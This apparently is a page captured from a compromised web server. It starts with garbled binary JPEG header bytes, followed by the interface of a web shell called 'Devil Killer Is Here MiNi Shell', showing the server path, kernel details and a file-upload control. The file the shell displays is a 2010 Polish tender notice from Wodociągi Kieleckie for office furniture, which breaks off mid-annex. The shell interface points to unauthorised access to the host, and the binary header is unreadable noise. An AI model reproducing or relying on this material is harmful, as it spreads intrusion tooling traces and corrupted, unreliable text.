JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100830/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100830/269834-N-2010.html

<p class="kh_header"><b>Kielce: Dostawa mebli biurowych.</b><br>
<b>Numer ogłoszenia: 269834 - 2010; data zamieszczenia: 30.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wodociągi Kieleckie Sp. z o.o. , ul. Krakowska 64, 25-701 Kielce, woj. świętokrzyskie, tel. 041 3653100, faks 041 3455220.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wod-kiel.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli biurowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem postępowania jest dostawa mebli biurowych według poniższego zestawienia:

PAKIET I: umeblowanie pokoju nr 15 i nr 15a -Wydział Sieci Wodociągowej, 
(z wyłączeniem foteli obrotowych  i  krzeseł).

1.	Zabudowa pokoju nr 15 i nr 15a  w kolorze /buk/ -  zgodnie z  załączonym opisem - zał.nr 5  i rysunkiem  poszczególnych elementów - zał. nr 5a.
LP.         Nazwa towaru	
1.	Szafka z szufladą i drzwiczkami (szuflada i drzwiczki zamykane na klucz) wymiary 500 mm x 600 mm x W *	Ilość w szt.3
2.	Szafka z szufladą i drzwiczkami (szuflada i drzwiczki zamykane na klucz) wymiary 600 mm x 600 mm x W *	Ilość w szt.1
3.	Szafka z szufladą i drzwiczkami (szuflada i drzwiczki zamykane na klucz) wymiary700 mm x 600 mm x W *	Ilość w szt.1
4.	Szafka na segregatory z drzwiczkami wymiary 400mm x 600 mm x  W *	Ilość w szt.1
5.	Biurko wymiary 1700 mm x 650 mm x W* z wysuwaną półką na klawiaturę	Ilość w szt.4
6.	Biurko wymiary 1600 mm x 900 mm x W* z wysuwaną  półką na klawiaturę	Ilość w szt.1
7.	Blat półokrągły podparty na jednej nodze - dostawka do biurka 1390 mm x 600 mm x W*	Ilość w szt.2
8.	Blat ? koła podparty na jednej nodze - dostawka do biurka o promieniu 600mm i W*	Ilość w szt.1
9.	Kontener na kółkach z szufladami zamykanymi na klucz o wymiarach 400 mm x 500mm x 520 mm	Ilość w szt.5
10.	Szafa ubraniowa 800 mm x 600 mm x 1800 mm 	Ilość w szt.1
11.	Nadstawka do szafy ubr. 800 mm x 600 mm x 500 mm	Ilość w szt.1
12.	Słupek na segregatory 600 mm x 350 mm x 1800 mm - z drzwiczkami (5 półek)	Ilość w szt.1
13.	Nadstawka na słupek na segregatory 600 mm x 350 mm x 500 mm z drzwiczkami	Ilość w szt.1
14.	Regał na segregatory 900 mm x 380 mm x 1800 mm - otwarty (5 półek)	Ilość w szt.1
15.	Nadstawka na regał 900 mm x 380 mm x 800 mm	Ilość w szt.1
16.	Szafka półokrągła na segregatory 360 mm x 360 mm x 2500 mm - otwarta	Ilość w szt.1
17.	Regał narożny na segregatory 760 mm x 760 mm x 2500 mm - otwarty	Ilość w szt.1
18.	Regał na segregatory 800 mm x 360 mm x 2500 mm - dwie dolne półki zabudowane drzwiczkami, pozostałe półki otwarte 	Ilość w szt.1
19.	Regał na segregatory 700 mm x 360 mm x 2500 mm zabudowany drzwiczkami 	Ilość w szt.1
20.	Szafka z drzwiczkami 800 mm x 360 mm x 250 mm	Ilość w szt.1
21.	Podstawka pod komputer na kółkach o wymiarach 500 mm x 260 mm z ogranicznikami uniemożliwiającymi przesuwanie do tyłu i na boki	Ilość w szt.5

*   - wysokość mebli zgodna z wysokością biurka

2.	Przed przystąpieniem do przetargu, Wykonawca obowiązany jest do dokonania wizji lokalnej na miejscu wraz z koniecznym pomiarem pomieszczenia pod kątem proponowanych mebli.

PAKIET II: umeblowanie pokoju nr 59 - JRP, (z wyłączeniem foteli obrotowych  i  krzeseł).

1.	Zabudowa pokoju nr 59 w kolorze /wiśnia Oxford/ -  zgodnie z  załączonym opisem - zał.nr 6  i rysunkiem  poszczególnych elementów - zał. nr 6a.

LP.	Nazwa towaru	
1.	Szafka z szufladą i drzwiczkami i półką  (szuflada i drzwiczki zamykane na klucz) wymiary 500 mm x 600 mm x W*	Ilość w szt.2
2.	Szafka z szufladami  zamykane na klucz  wymiary 400 mm x 600 mm x W*	Ilość w szt.2
3.	Półka wisząca  na segregatory wymiary 600 mm x 400 mm x 400 mm	Ilość w szt.2
4.	Biurko półokrągłe profilowane  wymiary 1700 mm x 830 mm x W*  z wysuwaną półką na klawiaturę komputera ,na stelażu metalowym chrom-mat. z przesłoną z blachy perforowanej  Alu.	Ilość w szt.2
5.	Nadstawka do regału narożnego  460 mm (szerokość frontu) x głębokość**  x 400 mm z dwiema półkami zamykanymi drzwiczkami na klucz	Ilość w szt.1
6.	Regał narożny 460 mm (szerokość frontu) x głębokość** x  1900 mm - dwie półki dolne zabudowane drzwiczkami zamykanymi na klucz ,pozostałe otwarte	Ilość w szt.1
7.	Regał na segregatory 900 mm x 360 mm x 1900 mm - dwie dolne półki zabudowane drzwiczkami zamykanymi na klucz , pozostałe półki otwarte 	Ilość w szt.3
8.	Nadstawka na regał  900 mm x 360mm x 400mm z dwiema półkami zabudowanymi drzwiczkami zamykanymi na klucz	Ilość w szt.3
9.	Nadstawka na regał  460 mm x 360 mm x 400 mm z dwiema półkami zabudowanymi drzwiczkami zamykanymi na klucz	Ilość w szt.1
10.	Regał na segregatory 460 mm x 360 mm x 1900 mm - dwie dolne półki zabudowane drzwiczkami zamykanymi na klucz , pozostałe półki otwarte	Ilość w szt.1
11.	Nadstawka na regał  400 mm x 360 mm x 400 mm z dwiema półkami zabudowanymi drzwiczkami zamykanymi na klucz	Ilość w szt.1
12.	Regał na segregatory 400 mm x 360 mm x 1900 mm - dwie dolne półki zabudowane drzwiczkami zamykanymi na klucz, pozostałe półki otwarte 	Ilość w szt.1
13.	Nadstawka na biurko pod monitor komputera	Ilość w szt.2
14.	Wieszak ubraniowy naścienny z półką na kapelusze	Ilość w szt.1
15.	Podstawka pod komputer na kółkach o wymiarach 500mm x 260mm z ogranicznikami uniemożliwiającymi przesuwanie do tyłu i na boki	Ilość w szt.2
*   - wysokość mebli zgodna z wysokością biurka
** - wymiary głębokości zgodne z rysunkiem
2.	Przed przystąpieniem do przetargu, Wykonawca obowiązany jest do dokonania wizji lokalnej na miejscu wraz z koniecznym pomiarem pomieszczenia pod kątem proponowanych mebli.
       
PAKIET III:  Meble do pokoju nr 19 - Wydział Kontroli Podłączeń i Egzekucji Należności

      1. Nadstawka szafy - 
a)	2-drzwiowa, 
b)	zamykana  na zamek ,
c)	wymiary:  Sz -  600 mm,  G - 400 mm, W - 400 mm 
d)	materiał : konstrukcja i półki wykonane z płyty laminowanej grubości min.18 mm w kolorze  /dzika grusza jasna/ (kolor i wygląd zewnętrzny dopasowany do istniejących mebli).

2.Szafa na akta -
a)	2-drzwiowa, 
b)	zamykana  na klucz ,
c)	wymiary:  Sz -  800 mm,  G - 400 mm,  W - 1180 mm,  
d)	dolny cokół : 90 mm,
e)	podzielona dwiema poziomymi półkami na 3 jednakowe poziomy przeznaczone
      do przechowywania segregatorów A4 w pozycji pionowej,
f)	materiał : konstrukcja i półki wykonane z płyty laminowanej grubości min.18 mm w kolorze  /dzika grusza jasna/ (kolor i wygląd zewnętrzny dopasowany do istniejących mebli).
Uwagi do pakietu I, II, III.
1.	Kształt i wymiary mebli zgodne z załączonym schematem.
2.	Rozmieszczenie półek w meblach przeznaczonych na przechowywanie segregatorów powinno być tak dobrane, aby ich wysokość w świetle wynosiła minimum 330 mm.
3.	Konstrukcja i półki mebli wykonane z płyty grubości minimum 18 mm.
4.	Wysokość wszystkich biurek ma być jednakowa i mieścić się w granicach 730 - 750 mm.
5.	Blat biurka wykonany z płyty wiórowej laminowanej grubości minimum 25 mm.
6.	Wszystkie fronty dostarczonego umeblowania mają być wykonane z płyty wiórowej laminowanej grubości minimum 18 mm.
7.	Ścianka tylna szaf, regałów,  kontenerów itp. nie może być wsuwana.
8.	Wykończenia z okleiny PCV o grubości minimum 2 mm.
9.	Zawiasy typu Blum + Blumontion lub równoważne.

PAKIET IV: fotele i krzesła.

      1.Fotel gabinetowy -  szt. 1
a)	Tapicerka Micro w kolorze beżowym, dopasowanym do koloru tapicerki
     krzeseł w gabinecie Dyrektora ds. Inwestycjnych i Logistyki
b)	podłokietniki w kolorze czereśni koniakowej,
c)	wysokość siedziska regulowana za pomocą podnośnika pneumatycznego,
d)	siedzisko wyprofilowane w części lędźwiowej, 
e)	kółka do powierzchni miękkich. 
f)	objęte gwarancją w systemie /door to door/.

2.Fotele obrotowe  -  szt. 13
a)	tapicerowane tkaniną Micro w kolorze granatowym, 
b)	wyposażone w podłokietniki,
c)	wyposażone w mechanizm /TILT/ umożliwiający ich blokadę w pozycji /do pracy/,
d)	wysokość siedzisk regulowana za pomocą podnośnika pneumatycznego,
e)	siedziska wyprofilowane w części lędźwiowej,  
f)	wyposażone w nylonową podstawę jezdną, 
g)	objęte gwarancją w systemie /door to door/.

3.Krzesła  -  szt. 6
               a) dostawiane,
               b) o metalowej,  chromowanej ramie, 
               c) z miękkim tapicerowanym siedziskiem i  oparciem,
               d) tapicerka w kolorze  granatowym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówienia uzupełniającego stanowiącego nie więcej niż 20% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.11.20.00-0, 39.11.31.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Postępowanie nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- Zabudowa pokoju nr 15 i nr 15a  - załączony rysunek lub zdjęcie i opis poszczególnych elementów oferowanych mebli.
- Zabudowa pokoju nr 59  - załączony rysunek lub zdjęcie  i opis poszczególnych  elementów  oferowanych mebli.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia spełnienia warunków określonych w pkt. III.3.1. - III.3.5. Wykonawca ma obowiązek złożyć oświadczenie według wzoru określonego w załączniku nr  2 do SIWZ.
Oferta musi być podpisana przez Wykonawcę lub osoby upoważnione do reprezentowania Wykonawcy. 
Dokumenty, o których  mowa w punkcie III.4. są składane w formie oryginału, odpisu lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub upoważnionego na podstawie pisemnego pełnomocnictwa przedstawiciela Wykonawcy.
Dokumenty sporządzone w języku obcym są składane wraz  z tłumaczeniem na język polski, poświadczonym przez Wykonawcę lub upoważnionego na podstawie pisemnego pełnomocnictwa przedstawiciela Wykonawcy.

Jeżeli  dokumenty zostaną podpisane przez pełnomocnika, do oferty należy dołączyć prawnie skuteczne pełnomocnictwo. Pełnomocnictwo musi być złożone w formie oryginału lub kopii poświadczonej notarialnie.
W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, każdy 
z warunków określonych w sekcji III  punkt 3 ppkt 3.1, 3.2, 3.3, 3.4, 3.5 winien spełniać co najmniej jeden z tych Wykonawców lub wszyscy wspólnie. Warunek określony w sekcji III  punkt 4 ppkt 4.2 powinien spełniać każdy z Wykonawców samodzielnie. 
Wykonawcy występujący wspólnie są zobowiązani ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
Dokument potwierdzający ustanowienie pełnomocnika powinien zawierać wskazanie postępowania którego dotyczy, Wykonawców ubiegających się wspólnie o zamówienie oraz zakres jego umocowania, a także oświadczenie o przyjęciu wspólnej odpowiedzialności za wykonanie lub  nienależyte wykonanie zamówienia. Winien on być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o zamówienie publiczne. 
Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli w imieniu Wykonawcy. 
Dokument pełnomocnictwa należy przedstawić w formie oryginału lub kopii poświadczonej notarialnie.
Wszelka korespondencja prowadzona  będzie wyłącznie z podmiotem występującym jako pełnomocnik.
Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający może zażądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wod-kiel.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> WODOCIĄGI KIELECKIE  Sp. z o.o. 25-701 Kielce ul. Krakowska 64, Biuro Obsługi Klienta.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.09.2010 godzina 10:45, miejsce: Biuro Obsługi Klienta, 25-701 Kielce ul. Krakowska 64.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET I: umeblowanie pokoju nr 15 i nr 15a -Wydział Sieci Wodociągowej, 
(z wyłączeniem foteli obrotowych  i  krzeseł).

1.	Zabudowa pokoju nr 15 i nr 15a  w kolorze /buk/ -  zgodnie z  załączonym opisem - zał.nr 5  i rysunkiem  poszczególnych elementów - zał. nr 5a.
LP.         Nazwa towaru	
1.	Szafka z szufladą i drzwiczkami (szuflada i drzwiczki zamykane na klucz) wymiary 500 mm x 600 mm x W *	Ilość w szt.3
2.	Szafka z szufladą i drzwiczkami (szuflada i drzwiczki zamykane na klucz) wymiary 600 mm x 600 mm x W *	Ilość w szt.1
3.	Szafka z szufladą i drzwiczkami (szuflada i drzwiczki zamykane na klucz) wymiary700 mm x 600 mm x W *	Ilość w szt.1
4.	Szafka na segregatory z drzwiczkami wymiary 400mm x 600 mm x  W *	Ilość w szt.1
5.	Biurko wymiary 1700 mm x 650 mm x W* z wysuwaną półką na klawiaturę	Ilość w szt.4
6.	Biurko wymiary 1600 mm x 900 mm x W* z wysuwaną  półką na klawiaturę	Ilość w szt.1
7.	Blat półokrągły podparty na jednej nodze - dostawka do biurka 1390 mm x 600 mm x W*	Ilość w szt.2
8.	Blat ? koła podparty na jednej nodze - dostawka do biurka o promieniu 600mm i W*	Ilość w szt.1
9.	Kontener na kółkach z szufladami zamykanymi na klucz o wymiarach 400 mm x 500mm x 520 mm	Ilość w szt.5
10.	Szafa ubraniowa 800 mm x 600 mm x 1800 mm 	Ilość w szt.1
11.	Nadstawka do szafy ubr. 800 mm x 600 mm x 500 mm	Ilość w szt.1
12.	Słupek na segregatory 600 mm x 350 mm x 1800 mm - z drzwiczkami (5 półek)	Ilość w szt.1
13.	Nadstawka na słupek na segregatory 600 mm x 350 mm x 500 mm z drzwiczkami	Ilość w szt.1
14.	Regał na segregatory 900 mm x 380 mm x 1800 mm - otwarty (5 półek)	Ilość w szt.1
15.	Nadstawka na regał 900 mm x 380 mm x 800 mm	Ilość w szt.1
16.	Szafka półokrągła na segregatory 360 mm x 360 mm x 2500 mm - otwarta	Ilość w szt.1
17.	Regał narożny na segregatory 760 mm x 760 mm x 2500 mm - otwarty	Ilość w szt.1
18.	Regał na segregatory 800 mm x 360 mm x 2500 mm - dwie dolne półki zabudowane drzwiczkami, pozostałe półki otwarte 	Ilość w szt.1
19.	Regał na segregatory 700 mm x 360 mm x 2500 mm zabudowany drzwiczkami 	Ilość w szt.1
20.	Szafka z drzwiczkami 800 mm x 360 mm x 250 mm	Ilość w szt.1
21.	Podstawka pod komputer na kółkach o wymiarach 500 mm x 260 mm z ogranicznikami uniemożliwiającymi przesuwanie do tyłu i na boki	Ilość w szt.5

*   - wysokość mebli zgodna z wysokością biurka

2.	Przed przystąpieniem do przetargu, Wykonawca obowiązany jest do dokonania wizji lokalnej na miejscu wraz z koniecznym pomiarem pomieszczenia pod kątem proponowanych mebli..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET II: umeblowanie pokoju nr 59 - JRP, (z wyłączeniem foteli obrotowych  i  krzeseł).

1.	Zabudowa pokoju nr 59 w kolorze /wiśnia Oxford/ -  zgodnie z  załączonym opisem - zał.nr 6  i rysunkiem  poszczególnych elementów - zał. nr 6a.

